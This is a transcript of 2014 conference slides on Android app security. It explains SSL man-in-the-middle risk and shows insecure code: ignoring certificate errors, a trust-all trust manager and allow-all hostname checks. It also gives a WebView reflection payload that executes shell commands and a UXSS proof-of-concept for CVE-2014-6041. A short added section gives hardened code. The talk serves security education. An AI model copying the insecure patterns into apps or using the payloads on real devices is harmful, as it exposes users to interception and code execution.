[2014/10/06] HITCON Freetalk - App Security on Android

Posted on 01-Dec-2014


Transcript of [2014/10/06] HITCON Freetalk - App Security on Android

App Security on Android

岑志豪 Anfa Sam anfa@devco.re

DEVCORE Co., Ltd. (戴夫寇爾股份有限公司)


1. Client Hello
2. Server Hello
3. Certificate
4. ServerHelloDone
5. ClientKeyExchange
6. ChangeCipherSpec
7. Handshake Finished
8. ChangeCipherSpec
9. Handshake Finished
10. Application Data (HTTP)
11. Application Data (HTTP)

Server Authentication

The handshake process of an SSL encrypted connection

Checking the server certificate

‧ Using an SSL encrypted connection alone does not make the connection secure

‧ The certificate presented by the server must be checked to be trustworthy and valid


[Diagram: Man-In-The-Middle Attack (中間人攻擊), with the Attacker positioned between the Victim and the Server]


URL url = new URL("https://wikipedia.org");
URLConnection urlConnection = url.openConnection();
InputStream in = urlConnection.getInputStream();
…
WebView mWebView = (WebView) findViewById(R.id.webView);
mWebView.loadUrl("https://wikipedia.org");


ref: http://devco.re/blog/2014/08/15/ssl-mishandling-on-mobile-app-development/

ref: http://www.zdnet.com/hundreds-of-android-apps-open-to-ssl-linked-intercept-fail-7000033365/

ref: http://www.kb.cert.org/vuls/id/582497

ref: http://www.find.org.tw/find/home.aspx?page=many&id=385


An SSL connection whose certificate has been judged invalid is continued anyway by calling handler.proceed()

mWebView.setWebViewClient(new WebViewClient() {
    @Override
    public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) {
        handler.proceed(); // Ignore SSL certificate errors
    }
});


TrustManager[] trustAllManager = new TrustManager[] {
    new X509TrustManager() {
        @Override
        public void checkClientTrusted(X509Certificate[] chain, String authType) { }

        @Override
        public void checkServerTrusted(X509Certificate[] chain, String authType) { }

        @Override
        public X509Certificate[] getAcceptedIssuers() { return null; }
    }
};

SSLContext sslContext = SSLContext.getInstance("TLS");
sslContext.init(null, trustAllManager, null);

The component that implements the SSL check by default is replaced with one that ignores the SSL check entirely


URL url = new URL("https://www.example.com/");
HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();

conn.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
// or ...
conn.setHostnameVerifier(new HostnameVerifier() {
    @Override
    public boolean verify(String hostname, SSLSession session) {
        return true;
    }
});

No verification is performed at all; every hostname passes the check
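As an added example that is not part of the original talk, the hardened counterpart of the trust-all manager and the allow-all hostname verifier shown above: a trust store limited to a CA certificate the app ships itself, and a hostname verifier that accepts only the host the app intends to reach. The class name PinnedHttps, its method names and the resource file pinned_ca.pem are assumptions.

```java
import java.io.InputStream;
import java.net.URL;
import java.security.KeyStore;
import java.security.cert.Certificate;
import java.security.cert.CertificateFactory;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManagerFactory;

public final class PinnedHttps {

    // Build an SSLContext that trusts only the CA certificate bundled with the app
    // (assumed to be shipped as res/raw/pinned_ca.pem and opened by the caller).
    public static SSLContext pinnedContext(InputStream pemCaCert) throws Exception {
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        Certificate ca = cf.generateCertificate(pemCaCert);

        KeyStore keyStore = KeyStore.getInstance(KeyStore.getDefaultType());
        keyStore.load(null, null);                 // empty in-memory trust store
        keyStore.setCertificateEntry("pinned-ca", ca);

        // A real X509TrustManager: the server chain must lead to the pinned CA,
        // unlike the empty checkServerTrusted() above which accepts anything.
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(
                TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(keyStore);

        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, tmf.getTrustManagers(), null);
        return ctx;
    }

    // Accept only the expected host, and still run the platform's own
    // certificate-name check, so a certificate issued for another name fails.
    public static HostnameVerifier strictVerifier(final String expectedHost) {
        final HostnameVerifier platform = HttpsURLConnection.getDefaultHostnameVerifier();
        return new HostnameVerifier() {
            @Override
            public boolean verify(String hostname, SSLSession session) {
                return expectedHost.equalsIgnoreCase(hostname)
                        && platform.verify(hostname, session);
            }
        };
    }

    public static HttpsURLConnection open(String urlString, SSLContext ctx) throws Exception {
        URL url = new URL(urlString);
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.setSSLSocketFactory(ctx.getSocketFactory());
        conn.setHostnameVerifier(strictVerifier(url.getHost()));
        return conn;
    }
}
```

With this configuration a connection intercepted with a certificate from any other CA, or issued for any other name, fails the handshake instead of being silently accepted.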


class JsObject {
    public String toString() { return "Hello World"; }
}

webView.getSettings().setJavaScriptEnabled(true);
webView.addJavascriptInterface(new JsObject(), "injectedObject");
webView.loadUrl("http://www.example.com/");

<html>
  <head>…
    <script>
      alert(injectedObject.toString());
    </script>
  </head>
  <body>…</body>
</html>

Hello World


<script>
function execute(cmdArgs) {
    return injectedObject.getClass().forName("java.lang.Runtime")
        .getMethod("getRuntime", null)
        .invoke(null, null).exec(cmdArgs);
}
execute(["/system/bin/sh", "-c", "cat vuln >> attacker.txt"]);
</script>

Java Reflection API


Test URL: http://devstd.in/cve/2014-6041/

Test environment: Android 4.1.1

<html>
  <head>
    <title>CVE-2014-6041 UXSS DEMO</title>
  </head>
  <body>
    <iframe name="target_frame" src="http://devco.re/"></iframe>
    <br />
    <input type="button" value="go"
           onclick="window.open('\u0000javascript:alert(document.body.innerHTML)', 'target_frame')" />
  </body>
</html>


Test results

UC Browser HD 3.4.1.483

CM Browser 5.0.74

Maxthon Browser 4.3.2.2000


Android version   CVE-2012-6636    CVE-2014-1939    CVE-2014-6041
Android 2.X       vulnerable       non-vulnerable   non-vulnerable
Android 3.X       vulnerable       vulnerable       non-vulnerable
Android 4.0.X     vulnerable       vulnerable       vulnerable
Android 4.1.X     vulnerable       vulnerable       vulnerable
Android 4.2.X     non-vulnerable   non-vulnerable   vulnerable
Android 4.3.X     non-vulnerable   non-vulnerable   vulnerable
Android 4.4.X     non-vulnerable   non-vulnerable   non-vulnerable
